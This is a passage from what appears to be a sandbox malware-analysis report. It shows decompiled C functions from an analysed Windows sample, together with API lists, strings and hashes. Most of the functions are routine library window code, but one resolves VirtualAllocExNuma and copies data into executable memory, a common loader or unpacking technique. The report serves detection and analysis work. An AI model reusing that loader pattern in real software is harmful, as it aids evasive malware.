						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x4373bc; // 0x43733c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x4373bc; // 0x43733c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x4373c0; // 0x43737c
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x4373c0; // 0x43737c
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

APIs

Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C

Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42

GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3

Strings

|sC, xrefs: 0040A6B6, 0040A7E9, 0040A7F7
<sC, xrefs: 0040A675, 0040A680, 0040A72A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID: <sC$|sC
API String ID: 3442286286-4181122796
Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413E4C(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E004126FB();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E00406330( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E004136A7(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E004137BE(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

APIs

SendMessageA.USER32 ref: 00413F05
GetWindowLongA.USER32 ref: 00413F16
GetWindowLongA.USER32 ref: 00413F26
SetWindowLongA.USER32 ref: 00413F42

Strings

(, xrefs: 00413EF0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004264D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004264D7(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E00424BFB();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E004072C1(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E004265F4( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E004065EE( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E004065EE( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508

Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

.INI, xrefs: 004265D0
.HLP, xrefs: 004265A3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E0041BA31(0);
				_t23 = E0041BBD7(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E0041BA31(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

APIs

Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41

SendMessageA.USER32 ref: 0041BA95
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
MessageBoxA.USER32 ref: 0041BB11
EnableWindow.USER32(00000000,00000001), ref: 0041BB2D

Strings

]hA, xrefs: 0041BA5F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: ]hA
API String ID: 1958756768-937096280
Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004219DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E00414DCC(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x68));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0x90) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0x90) = _t42;
								L17:
								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0x90);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
									L21:
									return _t30;
								}
								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
						 *(_t45 + 0x90) = 0xe002;
					} else {
						 *(_t45 + 0x90) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

APIs

SendMessageA.USER32 ref: 00421A41
UpdateWindow.USER32(?), ref: 00421A58
GetParent.USER32(?), ref: 00421AC3
PostMessageA.USER32 ref: 00421ADF

Strings

@, xrefs: 00421AAE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00414364, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				void* _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E004249C4() + 0x58;
				_t25 = E00424BFB();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					_t34 = E004142C3();
					_t50 = _t34;
					if(_t34 == 0) {
						E0041A6C8(_t50);
					}
				}
				return _t42;
			}

APIs

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394
Afx:%x:%x:%x:%x:%x, xrefs: 004143B0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411BB7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E00414007(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E00414DCC(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E00415EEB(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

APIs

GetWindowLongA.USER32 ref: 00411BF8
GetDlgItem.USER32 ref: 00411C17
IsWindowEnabled.USER32(00000000), ref: 00411C22
SendMessageA.USER32 ref: 00411C38

Strings

Edit, xrefs: 00411C02

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C

Uniqueness

Uniqueness Score: -1.00%

Function 004012BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004012BE(intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__** _t11;

				_v12 = 0;
				_v8 = 0;
				_t11 =  &_v8;
				_push(_t11);
				_push("kernel32.dll");
				_push(0);
				L0040C36A();
				if(_t11 != 0) {
					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
					E00405700(_v12, _a4, _a8);
				}
				return _v12;
			}

0x004012c4
0x004012cb
0x004012d2
0x004012d5
0x004012d6
0x004012db
0x004012dd
0x004012e4
0x004012f5
0x00401316
0x00401325
0x0040132a
0x00401333

APIs

GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309

Strings

kernel32.dll, xrefs: 004012D6
VirtualAllocExNuma, xrefs: 004012E6

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: VirtualAllocExNuma$kernel32.dll
API String ID: 4190356694-3151700105
Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A2AB(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x0041a2ad
0x0041a2b4
0x0041a2c0
0x0041a2c2
0x0041a2ca
0x0041a2dd
0x0041a2e1
0x0041a2e4
0x0041a2e4
0x0041a2cc
0x0041a2d5
0x0041a2d5
0x0041a2ee

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4

Strings

GDI32.DLL, xrefs: 0041A2AF
SetLayout, xrefs: 0041A2BA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A275, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A275(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x0041a276
0x0041a289
0x0041a291
0x0041a29e
0x0041a2a1
0x0041a293
0x0041a298
0x0041a298
0x0041a2aa

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
SetLastError.KERNEL32(00000078), ref: 0041A2A1

Strings

GetLayout, xrefs: 0041A283
GDI32.DLL, xrefs: 0041A278

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
